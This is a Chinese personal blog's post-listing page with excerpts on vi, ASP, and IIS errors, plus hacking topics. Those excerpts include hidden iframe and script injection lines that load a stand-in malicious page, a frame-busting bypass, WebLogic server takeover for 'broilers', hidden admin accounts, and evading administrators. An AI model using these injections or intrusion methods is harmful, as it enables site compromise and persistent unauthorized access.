夜火博客 个人的碎碎念收集箱

vi 基础入门

vi 基础入门
翻译自Understanding basic vi (visual editor)
难度系数: 中
估计只需要5分钟

Vim 是一个基于高效文本编辑而设计的文本编辑装逼利器
是命令行编辑器的不二选择,当然在图形界面偶还是推荐 Intellij IDEA, 除非你真的很牛逼或很装逼
通常的 vi 其实调用的也是vim,在大多数的UNIX系统里默认都会捆绑一个

标签: Vim技术类

作者:夜火 分类:技术文章 浏览:2479 评论:0

使用ASP将文件打包为XML文件(带解包)

使用ASP将文件打包为XML文件(带解包) 工具可以将多个文件打包成一个XML文件,当然,也可以解包将其还原成原本的文件。这有什么作用呢?比如可以将一个站点的所有文件打包成一个XML文件,上传至服务器再解包,这会比从本地将所有文件上传至服务器快多了。

解压包中有三个文件Packa.asp、Packb.asp和Un_Pack.asp:

Packa.asp:打包工具(将指定文件夹的内容打包为单一XML文件)
Packb.asp:打包工具(将当前文件的内容打包为单一XML文件)
Un_Pack.asp:解包工具(将XML文件解包到当前文件夹中)

标签: ASP技术类

作者:夜火 分类:技术文章 浏览:2916 评论:0

HTTP 500 - 内部服务器错误 解决方法

在学校调试asp程序,或者服务器课上配置IIS,有时候就会碰到这该死的“HTTP 500 - 内部服务器错误”,怎么都搞不定,让夜火我好是火大,刚好在AK那看到这个HTTP 500 - 内部服务器错误 解决方法,转来记录之:

培训销售人员安装asp.net运行环境,真是各种情况都遇到了,IIS安装完成,一运行出现“HTTP 500 - 内部服务器错误”,网上找了一圈,处理方法那个叫复杂,在研究完复杂方法之后,发现只要三步就可以解决问题了。

标签: 技术类技巧

作者:夜火 分类:技术文章 浏览:7967 评论:1

详解挂马方法和技巧

1.挂马的N种方法

(1) HTML挂马法
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(’http://www.xxx.com/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML  = top.document.body.innerHTML + ‘ <inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。

(3)......

iframe的防插与强插

iframe的防插与强插,网上通用的防插那版是(子):

if(top.location != self.location){
top.location = self.location;
}

强插方案为(父):
 

var location="";

其中这个location是对被赋值的top.location方法的覆盖,导致方法失效。

......

标签: iframe技术类

作者:夜火 分类:技术文章 浏览:2513 评论:5

了解CSS挂马技术及相应防范方法

黑客们发现发现,用来制作网页特效的CSS代码,也可以用来做CSS挂马

随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

WebLogic简单抓鸡大法

题目:WebLogic简单抓鸡大法
作者:Mickey [I.S.T.O.]&hackest [H.S.T.]

此文章已发表在《黑客X档案》2008年第11期杂志上
后经作者发布在博客上,如转载请务必保留此信息!


Tomcat估计给很多人带来了N多肉鸡服务器了吧,直接扫描弱口令,进入Tomcat管理后台,上传Webshell就得到一台肉鸡服务器了,操作之简单,效率之高,实在是抓鸡必备!不过这次要介绍的是一个类似于Tomcat的JSP支持平台WebLogic漏洞的简单利用(其实也是默认口令),相比Tomcat会稍微复杂一些,不过操作起来也是比较容易的。

Windows中多种隐藏超级用户方法

一、如何在图形界面建立隐藏的超级用户

  图形界面下适用本地或开3389终端服务的肉鸡上。以前我提到过的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows 2000有两个注册表编辑器

标签: 技术类

作者:夜火 分类:技术文章 浏览:3733 评论:0

教你怎么使用服务器才不会被管理员发现

渗透的服务器也多了,起初都是给肉鸡装上鸽子啊,PCSHARE什么的,以为这样就OK了,但是往往到了第二天就不翼而飞,我起初很纳闷,我的后门都是免X的,管理员是怎么样发现我的踪迹的呢?后来慢慢积累了些心得,现发出来跟大家分享一下。

标签: 技术类

作者:夜火 分类:技术文章 浏览:5467 评论:0

Perl版NetCat(NC)

这个机器有多古老?4.6-RELEASE FreeBSD,没有gcc,没有make,连系统都乱七八糟的,port都不好使,pkg_add -r安装包都会有问题,真是无语了,还好有安装了一个Perl 5.8.8。修理Port花了半天时间,硬是没搞好。想想也不划算,把紧急要用的一些小工具花一会儿功夫自己做一个出来算了,于是有了这个简单的Perl 版NC,不过我没支持-e参数,用不着。

标签: Perl技术类

作者:夜火 分类:技术文章 浏览:2769 评论:0

Clickjacking - 点击劫持漏洞技术内幕

Clickjacking - 点击劫持漏洞技术内幕

Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙:

  当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用lynx一类的字符浏览器。

宽带用户防范“黑客”攻击的十大招式

  随着黑客工具的简单化和傻瓜化,众多的技术水平不高的用户也可以利用手中的黑客工具大肆进行攻击(这些人又被称为“灰客”),我们的上网安全受到了极大的威胁,难道我们只能被迫挨打,任其欺负吗?当然不是,只要设置得好,这些人是奈何不了我们的!请看本文讲述的十种方法。

标签: 技术类黑客

作者:夜火 分类:技术文章 浏览:2668 评论:1